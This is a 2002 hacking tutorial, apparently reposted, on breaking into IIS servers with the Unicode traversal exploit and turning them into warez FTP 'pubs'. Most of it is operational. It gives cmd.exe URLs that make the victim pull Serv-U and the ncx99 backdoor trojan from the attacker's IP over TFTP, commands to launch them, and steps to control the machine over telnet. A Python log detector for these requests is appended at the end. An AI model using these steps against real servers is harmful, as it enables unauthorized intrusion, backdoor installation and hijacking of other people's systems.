This document provides instructions for hacking IIS servers using exploits and establishing a pub on the compromised server. It outlines the required tools, including Serv-U FTP Server and TFTPSuitePro2000. It then details the steps to find a vulnerable server, upload hacking tools using TFTP, and execute programs to fully take control of the system and establish an FTP server pub. The document warns that these activities are illegal and users take full responsibility for their actions.
Original Description:
This is part of a hack series. Retired from The Onion Router.
The How-To Hack IIS Servers For Pubstros
Tutorial about Hacking using IIS exploits
This one goes for the people that ask for a tut to start hacking. If u wanna know more, research yourself.

Pub Hacking Tutorial
The How-To Hack IIS Servers For Pubstros (By GENERAL NEWBIE)
March 20, 2002

################## For Educational Use Only ##################

Getting started is simple... let me warn you that what you're doing is illegal and dangerous.

Now then, this tutorial tells you how to hack IIS servers and make them as a pub... and how to rehack someone else's pub hahahahaha! The tools and knowledge you will need are as follows.

Tools Required:
1. Serv-U FTP Server 4.0 works just fine, but version 3.0 doesn't require an additional dll file
2. TFTPSuitePro2000 (h**p://www.walusoft.co.uk/software/tftppro.exe)
3. Your brain, with knowledge of the IIS Unicode Exploit or MSDAC Exploit
4. Internet Explorer
5. Other things to try

OK, let me start by saying this is for education purposes only and I take no responsibility for what you do.

The Setup

Step 1: Install Serv-U AND download the already preconfigured ServUDaemon from me (recommended, as I will be explaining from this). The reason why I told you to download both is because the Serv-U version 4 that you download has an admin program, so you can make your own ini file after you understand everything I have in mine.

Step 2: Install TFTPSuite (during installation pick SERVER).

TFTPSuitePro Setup: Open TFTPSuitePro. When it asks u to register, hit Register then Cancel. You should have sumtin that looks like this

Hit System->Setup. For Inbound Path File, hit Browse and pick the C:\FTP dir we made, and do the same for Outbound, then hit OK. Now then, when it's time to upload files the TFTP SERVER MUST BE RUNNING.

Step 3: Unzip the Zip/Rar, where you will find some goodies to help you scan for IIS servers and find one to hack. Here you will find tons of little programs that will assist you in hacking your server.
Step 4: FIND A VULNERABLE SERVER

Step 5: Start Making the Pub

OK, I'm assuming you have a host that you can maybe get away with uploading files to.. and I say this because some networks are behind firewalls that don't allow TFTP to connect to an outside host and establish a connection. Thus even though you can use the unicode exploit on it to view all the files, it still doesn't mean you can upload files to it.. Plus some host administrators make it so that you can't write to the HD... GOOD LUCK THERE

Starting The Hack

FIRST, BEFORE YOU DO THIS BE SURE TO USE A PROXY !!!!!!!!!!!!!!!!

The Right Side, You Should Be At A Directory Listing In Internet Explorer. The dir should look like this:

    h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+dir+c:\   <----- This line will vary

    Directory of c:\
    07/17/02 12:17a 1,000,000 ---=1Mb=---
    05/03/02 08:57a 0 AUTOEXEC.BAT
    05/03/02 08:54a 0 AUTOEXEC.CAM
    06/01/01 09:09a 0 CONFIG.SYS
    12/26/01 12:46p <DIR> Desktop
    06/01/01 02:20p <DIR> I386
    07/08/02 02:52p <DIR> intepub
    06/01/01 02:49p <DIR> NIC
    12/23/01 08:32p <DIR> NIMDA TO
    12/23/01 08:32p <DIR> Nimda Tool
    07/17/02 05:56p 65,634,304 pagefile.sys
    01/04/02 04:31p <DIR> Program Files
    07/17/02 12:14a <DIR> TEMP
    06/05/01 05:01p <DIR> temptape
    06/01/01 04:53p <DIR> Video
    12/23/01 09:53p <DIR> Windows Update Setup Files
    07/17/02 05:50p <DIR> WINNT
    19 File 72,687,972 bytes
    480,750,592 bytes free

OK, you get the idea of what your browser looks like because you're experienced, but you are clueless about this pub crap.

Now then, you will need to start and run the TFTP SERVER, making sure you aren't running any firewall because it will block your request. Now we will need to send the files through the TFTP Server to the host. And to do this you do something like

    h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\ServUDaemon.exe

Now then, you aren't limited to just 1 dir to install this server to.. I like to hide mine in the c:\winnt\system but some people use the c:\intepub\scripts

    h**p://xxx.xxx.xxx.xx/scripts/..%%3...32/cmd.exe?/c+c:\winnt\system32\tftp.exe+"-i"+YourIPHere+get+ServUDaemon.exe+c:\WINNT\ServUDaemon.exe

So then you would copy the above line into Internet Explorer and hit Enter. Look at your TFTPSuitePro window and u should see it's uploading a file.

NOTE: SOMETIMES you get an error msg. Just refresh the page or.. copy into another window and try again. Remember, sometimes you get this msg because the host can't connect properly to you..

Repeat for the following files:

    SFIND.exe        -------> used to scan for more.. servers
    KILL.EXE         -------> used to kill a task, very handy
    TLIST.EXE        -------> used to list all running processes or Task List
    ncx99.exe        -------> used to have as a backdoor remote trojan that runs on port 99
    iis-scanner.EXE  great for scanning servers
    servudaemon.ini  needed for servu

HOW THE UPLOAD FILES SHOULD LOOK (gave 2 examples)

    h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+ServUDaemon.ini+c:\winnt\system\ServUDaemon.ini
    h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+ServUDaemon.exe+c:\winnt\system\ServUDaemon.exe
    h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+ServUDaemon.ini+c:\inetpub\scripts\ServUDaemon.ini
    h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+ServUDaemon.ini+c:\inetpub\scripts\ServUDaemon.exe
    h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+TzoLibr.dll+c:\winnt\system\TzoLibr.dll
    h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+ncx99.exe+c:\winnt\system\ncx99.exe
    h**p://www.target.com/scripts/..%25...md.exe?/c+tftp+-i+%20**.***.**.**+GET+bnc.cfg+c:\winnt\system\tlist.exe

EXECUTE PROGRAMS

    h**p://www.target.com/scripts/..%25...md.exe?/c+call+c:\winnt\system\ncx99.exe
    h**p://www.target.com/scripts/..%25...md.exe?/c+start+c:\winnt\system\ncx99.exe
    h**p://www.target.com/scripts/..%25...md.exe?/c+c:\ncx99.exe%20/h

After the file has been executed the FTP should be up! Test it with the server IP/Port/L/p you set up back in Serv-U FTP settings. If it works, you now have complete control over the system! Now then, here is where Serv-U 4.0 comes in: you may now use the admin program that comes with it so that you can set up your server the way you want. You have admin rights.

Other Shit

How To Use 'Kill' And 'Tlist' and 'ncx99.exe'

    Tlist     = Lists all running programs on the remote machine
    Kill      = Kills ones u specify
    ncx99.exe = DOS-like trojan

How to use ncx99

    C:\>telnet host 99

Then once you connect to your server you will see a DOS-like environment, so find where you uploaded tlist.exe and execute it

    c:\> cd winnt
    c:\>winnt\ cd system
    c:\>winnt\system\tlist.exe

Tlist is good when you have ncx99.exe installed, so it's easier to just call it up

    c:\>winnt\system\tlist.exe
    -2 Idle.exe
    4 System.exe
    840 smss.exe
    948 csrss.exe
    972 winlogon.exe NetDDE Agent
    1016 services.exe
    1028 lsass.exe
    1216 svchost.exe
    1364 svchost.exe
    1500 svchost.exe
    1636 svchost.exe
    1820 spoolsv.exe
    1952 CTSVCCDA.exe
    1988 mdm.exe
    2024 DUC20.exe Duc20
    408 MsPMSPSv.exe
    3024 svchost.exe
    360 explorer.exe Program Manager
    3496 ctfmon.exe CiceroUIWndFrame
    3068 WinCinemaMgr.exe InterVideo WinCinema Manager
    1124 evntsvc.exe Notification Wnd for RNAdmin
    1568 msmsgs.exe DDE Server Window
    2664 iis-scanner.exe Notification Window
    2172 r_server.exe
    3712 daemon.exe
    2800 cmd.exe Command Prompt
    3880 TLIST.exe
    -2 _Total.exe

Now then, to kill it there are two ways. I will show you the first, which is from within ncx99.exe, because it's best. Just look at the tlist.exe list and find the system process you want to kill. Now from the same dir that you installed kill, run kill, and for me it would be

    c:\>winnt\system\kill.exe

Now then, let's say I wanted to close explorer.exe. I look at the tlist and see that '360 explorer.exe' Program Manager. 360 is the process id that you will use to close down explorer.exe, so you call it like this

    c:\>winnt\system\kill.exe 360

Do another tlist.exe and you will no longer see explorer.exe there.

The other way to do this is to use the url

    h**p://www.target.com/scripts/..%25...md.exe?/c+start+c:\winnt\system\kill.exe? number

where number is again from the tlist.exe, so to kill explorer.exe we do something like this

    h**p://www.target.com/scripts/..%25...md.exe?/c+start+c:\winnt\system\kill.exe? 360

and it should say killed.
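
Seen from the server side, every request described above lands in the IIS W3C log with the command line in the query string, so the TFTP pull and the later program launch can be picked out and tied to one client. The following is an added example, not part of the original tutorial: the log lines are constructed, "<elided>" stands in for the encoding the tutorial's URLs also elide, and the rule names and field selection are assumptions.

```python
import re

# Constructed W3C-format IIS log lines (documentation IP ranges). "<elided>"
# stands in for the encoded sequence that the tutorial's URLs also elide.
SAMPLE_LOG = r"""
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2002-07-17 17:50:01 192.0.2.10 GET /default.htm - 200
2002-07-17 17:51:12 198.51.100.7 GET /scripts/..%25<elided>../winnt/system32/cmd.exe /c+dir+c:\ 200
2002-07-17 17:52:40 198.51.100.7 GET /scripts/..%25<elided>../winnt/system32/cmd.exe /c+tftp+-i+203.0.113.5+GET+ServUDaemon.exe+c:\winnt\system\ServUDaemon.exe 200
2002-07-17 17:53:05 198.51.100.7 GET /scripts/..%25<elided>../winnt/system32/cmd.exe /c+start+c:\winnt\system\ncx99.exe 200
2002-07-17 17:54:00 192.0.2.10 GET /scripts/search.asp q=cmd.exe+help 200
"""

TRAVERSAL = re.compile(r"\.\.(?:%|/|\\)")   # ".." followed by a raw or percent-encoded separator
SHELL = re.compile(r"cmd\.exe$", re.I)       # request path itself ends in the command interpreter
TFTP = re.compile(r'tftp(?:\.exe)?\+"?-i"?\+(?:%20)?([^+]+)\+get\+([^+]+)\+', re.I)
EXEC = re.compile(r"/c\+(?:start|call)\+(\S+)", re.I)

def scan(log_text):
    """Return (client_ip, tags) for every request that matches a rule."""
    fields, findings = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]        # column order comes from the log header
            continue
        if not line or line.startswith("#"):
            continue
        rec = dict(zip(fields, line.split()))
        stem, query = rec.get("cs-uri-stem", ""), rec.get("cs-uri-query", "")
        tags = []
        if TRAVERSAL.search(stem):
            tags.append("traversal")
        if SHELL.search(stem):
            tags.append("shell")
        if (m := TFTP.search(query)):
            tags.append(f"tftp-pull:{m.group(2)}<-{m.group(1)}")
        if (m := EXEC.search(query)):
            tags.append(f"exec:{m.group(1)}")
        if tags:
            findings.append((rec.get("c-ip"), tags))
    return findings

def staged_clients(findings):
    """Clients that both pulled a file over TFTP and launched a program."""
    pulled = {ip for ip, tags in findings if any(t.startswith("tftp-pull:") for t in tags)}
    ran = {ip for ip, tags in findings if any(t.startswith("exec:") for t in tags)}
    return sorted(pulled & ran)
```

The benign search request that merely mentions cmd.exe in its query is not flagged, because the shell rule looks only at the request path.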